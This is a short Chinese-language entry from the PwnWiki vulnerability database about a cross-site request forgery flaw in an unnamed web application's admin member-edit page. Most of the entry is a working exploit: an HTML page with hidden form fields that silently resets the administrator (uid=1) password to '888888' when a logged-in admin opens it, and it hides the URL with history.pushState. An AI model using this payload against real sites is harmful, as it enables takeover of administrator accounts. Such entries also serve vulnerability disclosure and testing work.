免费、自由、人人(PwnWiki.Com)可编辑的漏洞库
,
漏洞描述
恶意攻击者可以精心伪造一个html页面诱骗已登录的管理用户点击,从而更改管理员账户密码。
EXP
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://127.0.0.1/admin.php?c=member&m=edit&uid=1" method="POST">
<input type="hidden" name="page" value="0" />
<input type="hidden" name="memberemail" value="email protected" />
<input type="hidden" name="membername" value="admin" />
<input type="hidden" name="memberphone" value="18888888888" />
<input type="hidden" name="memberpassword" value="888888" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
PWNWIK.COM==免费、自由、人人可编辑的漏洞库
